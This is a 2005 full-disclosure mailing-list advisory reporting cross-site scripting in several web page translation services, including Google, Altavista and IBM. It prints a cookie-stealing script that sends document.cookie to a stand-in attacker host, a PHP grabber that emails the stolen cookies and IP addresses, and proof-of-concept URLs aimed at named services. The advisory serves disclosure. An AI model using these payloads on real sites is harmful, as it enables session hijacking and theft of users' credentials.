[<prev] [next>] [day] [month] [year] [list]
Message-ID: <1877.68.20.178.120.1135478234.squirrel@www.morx.org>
Date: Sun, 25 Dec 2005 02:37:14 -0000 (GMT)
From: simo@...x.org
To: bugtraq@...urityfocus.com,
"Full Disclosure" <full-disclosure@...ts.grok.org.uk>
Subject: Multiple Translation websites Cross Site
Scripting vulnerability:
Google, Altavista, IBM, freetranslation, worldlingo, etc
Title: Multiple Translation websites Cross Site Scripting
vulnerability
Author: Simo Ben youssef aka _6mO_HaCk <simo_at_morx_org>
Date: 22 December 2005
MorX Security Research Team
http://www.morx.org
Service: Translation tools/websites
Vendors: Google, altavista, IBM, freetranslation, worldlingo
paralink and almost any site using the webpage translation
technique
Vulnerability: Cross Site Scripting / Cookie-Theft / Relogin attacks
Tested on: Microsoft IE 6.0 and firefox 5.1
(should work on all browsers)
Details:
the following is a Cross Site Scripting vulnerability that i ve found so far
in all translation websites that i ve seen, these websites use URL webpage
translation method which consist of passing a url of a user choice to the web
application for translating purpose, in fact after the webpage is being
processed
(translated) the application dosent filter the webpage content before
outputing it
into the user browser.
Impact:
a remote attacker can construct a malicious code in a webpage then upload
it to his/her
webserver and make a vulnerable website user visit the page thru the
translation script
and therefor execute the malicious code contents by the client browser.
malicous code as an example can be a javascript code to steal the victim
cookie
exemple of a malicious webpage:
<SCRIPT>location.href='http://www.attacker-site/grabber.php?cookie='+escape(document.cookie)</SCRIPT>
this javascript code will redirect the victim to the attacker php script
to grab the cookie information
and then log it or/and send it back the the attacker email
exemple of a php grabber
<?php
$cookie = $_GET['cookie'];
$ip = getenv("REMOTE_ADDR");
$msg = "Cookie: $cookie\nIP Address: $ip";
$subject = "cookie";
mail("attacker@...il-address.com", $subject, $msg);
?>
for testing purpose you may use the following javascript
<script>alert('VULNERABLE'); alert(document.cookie);</script>
Proof Of Concept Exploits:
The following list is just a very small list of many vulnerable websites
paralink:
http://webtranslation.paralink.com/webtranslation.asp?clientid=default&appid=default&b=1&dir=en/fr&dic=general&extsvr=&auto=1&url=http://www.attacker-site/malicious-code.html
Google:
http://translate.google.com/translate?u=http://www.attacker-site/malicious-code.html
Freetranslation:
http://fets3.freetranslation.com/?Url=http%3A%2F%2Fwww.attacker-site.com%2Fmalicious-code.html&Language=English%2FSpanish&Sequence=core
Altavista:
http://babelfish.altavista.com/babelfish/urltrurl?tt=url&url=http://www.attacker-site/malicious-code.html&lp=zh_en
IBM:
http://www.alphaworks.ibm.com/aw.nsf/html/mt
http://192.195.29.104/demand?mtlang=enfr&translate=http%253A%252F%252Fwww.attacker-site%252Fmalicious-code.html
Worldlingo:
http://www.worldlingo.com/wl/services/S221S1U3QrQ4rVX1J4x4O5WifQlI6nxpL/translation?wl_trglang=DE&wl_rurl=http%3A%2F%2Fwww.attacker-site.com&wl_url=http%3A%2F%2Fwww.attacker-site.com%2Fmalicious-code.html
Comprendium:
http://www.comprendium.es/index_demo_text_ca.html
online-translator:
http://www.online-translator.com/url/tran_url.asp?lang=en&url=http%3A%2F%2Fwww.attacker-site.com%2Fmalicious-code.html&direction=er&template=General&cp1=NO&cp2=NO&autotranslate=on&transliterate=on&psubmit2.x=44&psubmit2.y=12
systranbox:
http://www.systranbox.com/systran/box
... and more
screen captures demonstrating the vulnerabilities:
www.morx.org/altavista.JPG
www.morx.org/altavista2.JPG
www.morx.org/google.JPG
www.morx.org/worldlingo.JPG
www.morx.org/worldlingo2.JPG
www.morx.org/freetranslation.JPG
www.morx.org/freetranslation2.JPG
www.morx.org/paralink.JPG
www.morx.org/paralink2.JPG
www.morx.org/online-translator.JPG
www.morx.org/ibm.JPG
www.morx.org/comprendium.JPG
www.morx.org/systran.JPG
Disclaimer:
this entire document is for eductional purposes and testing only.
Modification use and/or publishing this
information is entirely on your OWN risk, I cannot be held responsible for
any of the above
Most of the vendors were already contacted and informed about these
problems, some confirmed some didnt
answer back and some werent contacted because i couldnt find their contact
information.
My x-mas wish:
petit papa noel quand tu decendra du ciel avec tes cadeaux par milier n
oubli pas de foutre une bi** dans
le cu* a Abder (je t aime quand meme) :D
Greets:
Special Greets and Thanks to HandriX and all MorX members, Securma Massine
and Anasoft. greets to my brother
in fuxoring Abder :>
--
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists